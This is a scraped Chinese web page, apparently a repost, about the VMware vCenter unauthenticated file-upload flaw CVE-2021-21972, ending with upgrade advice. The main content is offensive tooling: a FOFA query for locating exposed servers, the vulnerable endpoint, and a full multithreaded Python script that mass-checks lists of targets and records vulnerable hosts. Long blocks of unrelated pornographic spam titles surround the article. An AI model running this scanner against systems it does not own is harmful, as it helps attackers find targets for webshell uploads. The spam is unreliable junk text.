校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > 關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題

關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題

熱門標簽:南充電銷外呼系統 株洲電銷 南昌外呼系統定制 陜西辦理400電話 信陽電銷外呼系統怎么樣 貴陽網絡外呼系統軟件 宿州外呼系統公司 海外工廠地圖標注 地圖標注小程序

背景

CVE-2021-21972 vmware vcenter的一個未授權的命令執行漏洞。該漏洞可以上傳一個webshell至vcenter服務器的任意位置,然后執行webshell即可。

影響版本

vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5

漏洞復現 fofa查詢

語法:title="+ ID_VC_Welcome +"

POC

https://x.x.x.x/ui/vropspluginui/rest/services/uploadova

使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC腳本批量驗證

#-*- coding:utf-8 -*-
banner = """
    888888ba       dP           
    88  `8b      88           
    a88aaaa8P' .d8888b. d8888P .d8888b. dP  dP 
    88  `8b. 88' `88  88  Y8ooooo. 88  88 
    88  .88 88. .88  88     88 88. .88 
    88888888P `88888P8  dP  `88888P' `88888P' 
  ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
        @time:2021/02/24 CVE-2021-21972.py
        C0de by NebulabdSec - @batsu         
 """
print(banner)

import threadpool
import random
import requests
import argparse
import http.client
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"

def get_ua():
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
          '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
         )
  return ua

def CVE_2021_21972(url):
  proxies = {"scoks5": "http://127.0.0.1:1081"}
  headers = {
    'User-Agent': get_ua(),
    "Content-Type": "application/x-www-form-urlencoded"
  }
  targetUrl = url + TARGET_URI
  try:
    res = requests.get(targetUrl,
              headers=headers,
              timeout=15,
              verify=False,
              proxies=proxies)
              # proxies={'socks5': 'http://127.0.0.1:1081'})
    # print(len(res.text))
    if res.status_code == 405:
      print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
      # print("[+] Command success result: " + res.text + "\n")
      with open("存在漏洞地址.txt", 'a') as fw:
        fw.write(url + '\n')
    else:
      print("[-] " + url + " 沒有發現CVE-2021-21972漏洞.\n")
  # except Exception as e:
  #   print(e)
  except:
    print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
  works = []
  with open(filename, "r") as f:
    for i in f:
      func_params = [i.rstrip("\n")]
      # func_params = [i] + [cmd]
      works.append((func_params, None))
  pool = threadpool.ThreadPool(pools)
  reqs = threadpool.makeRequests(CVE_2021_21972, works)
  [pool.putRequest(req) for req in reqs]
  pool.wait()

def main():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u",
            "--url",
            help="Target URL; Example:http://ip:port")
  parser.add_argument("-f",
            "--file",
            help="Url File; Example:url.txt")
  # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
  args = parser.parse_args()
  url = args.url
  # cmd = args.cmd
  file_path = args.file
  if url != None and file_path ==None:
    CVE_2021_21972(url)
  elif url == None and file_path != None:
    multithreading(file_path, 10) # 默認15線程

if __name__ == "__main__":
  main()

EXP 修復建議

vCenter Server7.0版本升級到7.0.U1c
vCenter Server6.7版本升級到6.7.U3l
vCenter Server6.5版本升級到6.5 U3n

到此這篇關于關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題的文章就介紹到這了,更多相關Vmware vcenter上傳漏洞內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

標簽:石嘴山 三明 開封 鄭州 汕頭 拉薩 玉林 晉城

巨人網絡通訊聲明:本文標題《關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題》,本文關鍵詞  關于,Vmware,vcenter,未,授權,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題》相關的同類信息!
  • 本頁收集關于關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題的相關信息資訊供網民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    欧美亚洲国产一区在线观看网站| 中文字幕中文在线不卡住| 成人美女在线观看| 蜜臀av性久久久久蜜臀av麻豆| 亚洲精品视频自拍| 亚洲视频在线观看一区| 中文字幕一区二区三区不卡 | 色综合久久综合| 成人免费福利片| yourporn久久国产精品| 成人中文字幕电影| 99国产精品久久久| 91视频免费观看| 色吊一区二区三区| 91国内精品野花午夜精品| 91久久精品国产91性色tv| 欧美肥妇bbw| 欧美人体做爰大胆视频| 欧美日韩不卡一区| 日韩欧美亚洲国产另类| 久久综合九色综合久久久精品综合 | 日韩丝袜情趣美女图片| 久久在线观看免费| 国产精品二三区| 亚洲午夜久久久久久久久电影院| 天天操天天干天天综合网| 久久99精品久久久久久国产越南| 国产一区啦啦啦在线观看| 成人av高清在线| 欧美日韩国产综合久久| 欧美大片在线观看一区| 亚洲欧美综合在线精品| 午夜视频在线观看一区二区| 国产精品主播直播| 91在线精品一区二区三区| 欧美人动与zoxxxx乱| 久久久久久久久久久久久夜| 综合久久久久久| 日韩在线一区二区三区| 丁香激情综合国产| 欧美一区二区三区精品| 中日韩免费视频中文字幕| 亚洲在线观看免费| 国产一区二区三区在线看麻豆| 91麻豆6部合集magnet| 精品剧情v国产在线观看在线| 中文字幕在线观看不卡| 欧美96一区二区免费视频| 国产毛片精品视频| 欧美日韩国产一二三| 国产精品成人一区二区三区夜夜夜| 午夜精品成人在线| 波多野结衣在线一区| 欧美电影免费观看高清完整版在线 | 中文字幕一区二区三区精华液 | 91.com视频| 亚洲私人影院在线观看| 激情欧美一区二区三区在线观看| 色婷婷久久综合| 欧美激情综合五月色丁香小说| 日本va欧美va精品发布| 欧日韩精品视频| 国产精品美女久久久久久久| 欧美aaaaaa午夜精品| 欧美在线免费观看亚洲| 中文一区在线播放| 国产自产高清不卡| 欧美mv日韩mv国产网站| 日韩电影在线观看一区| 欧亚一区二区三区| 亚洲一级不卡视频| 91啦中文在线观看| 国产精品全国免费观看高清| 国产一区啦啦啦在线观看| 日韩无一区二区| 狠狠色丁香九九婷婷综合五月| 91精品国产福利在线观看| 亚洲永久精品大片| 91亚洲大成网污www| 国产精品久久久久一区| 成人av网站在线观看免费| 国产亚洲精久久久久久| 极品美女销魂一区二区三区免费| 欧美一级二级三级乱码| 免费看精品久久片| 精品三级av在线| 国产乱码精品1区2区3区| 国产区在线观看成人精品| 国产成人日日夜夜| 国产精品久久久久国产精品日日| 成人妖精视频yjsp地址| 亚洲欧美一区二区不卡| 在线观看日韩毛片| 奇米影视一区二区三区小说| 精品国产免费一区二区三区四区 | 欧美日本精品一区二区三区| 日本中文在线一区| 久久综合九色综合97婷婷女人| 国产九九视频一区二区三区| 亚洲国产高清在线| 欧美亚一区二区| 麻豆成人综合网| 国产视频在线观看一区二区三区 | 欧美一区二区三区电影| 精品一区二区三区的国产在线播放| 久久久久青草大香线综合精品| 不卡高清视频专区| 亚洲图片自拍偷拍| www国产精品av| 色8久久人人97超碰香蕉987| 日本大胆欧美人术艺术动态| 欧美激情综合五月色丁香| 色综合久久久久久久久久久| 亚洲一级二级三级| 久久久久9999亚洲精品| 欧美在线观看一区| 国产乱码一区二区三区| 樱花草国产18久久久久| 日韩欧美中文一区二区| 91色综合久久久久婷婷| 精品一区二区三区在线视频| 一区二区三区在线看| 久久久久久久久伊人| 欧美日韩一卡二卡三卡 | 人禽交欧美网站| 国产精品电影院| 精品久久久三级丝袜| 欧美在线啊v一区| 国产不卡视频在线播放| 亚洲国产日产av| 国产精品传媒视频| 国产网站一区二区| 日韩午夜av电影| 69p69国产精品| 欧美在线免费观看亚洲| 91在线porny国产在线看| 国内精品免费**视频| 五月婷婷另类国产| 亚洲视频 欧洲视频| 国产欧美综合色| 精品国产第一区二区三区观看体验 | 亚洲小说欧美激情另类| 亚洲欧洲精品一区二区三区不卡| 精品国产在天天线2019| 欧美日韩一区高清| av午夜一区麻豆| 成人精品小蝌蚪| 懂色一区二区三区免费观看| 麻豆精品视频在线观看免费| 午夜精品免费在线| 午夜免费久久看| 亚洲高清在线精品| 亚洲天堂成人在线观看| 中文成人综合网| 国产精品欧美一级免费| 中文字幕av在线一区二区三区| 日韩三级免费观看| 欧美成人一区二区| 久久精品人人做人人综合| av不卡免费电影| 亚洲欧美激情小说另类| 1024国产精品| 《视频一区视频二区| 国产日韩欧美精品电影三级在线| 26uuu色噜噜精品一区| 精品国产成人在线影院| 久久影院视频免费| 久久九九国产精品| 中文字幕av一区二区三区| 国产精品美女久久久久aⅴ国产馆 国产精品美女久久久久av爽李琼 国产精品美女久久久久高潮 | 欧美一区二区视频免费观看| 国产精品天天看| 久久69国产一区二区蜜臀 | 国产高清不卡二三区| 欧美日韩一区二区在线视频| 中文字幕一区三区| 蜜桃一区二区三区在线| 欧美影片第一页| 国产精品久久免费看| 精品无人区卡一卡二卡三乱码免费卡| 色综合久久久久| 中文字幕免费观看一区| 韩国v欧美v日本v亚洲v| 欧美精品1区2区3区| 亚洲免费看黄网站| 国产成人欧美日韩在线电影| 日韩亚洲欧美高清| 婷婷开心激情综合| 91精品办公室少妇高潮对白| 国产精品久久久久久久浪潮网站| 韩国午夜理伦三级不卡影院| 欧美二区乱c少妇| 亚洲国产视频一区二区| 色呦呦网站一区| 日韩理论片网站| 99re这里只有精品首页| 日韩伦理av电影| 99久久精品情趣| 亚洲免费视频中文字幕| 丁香婷婷深情五月亚洲|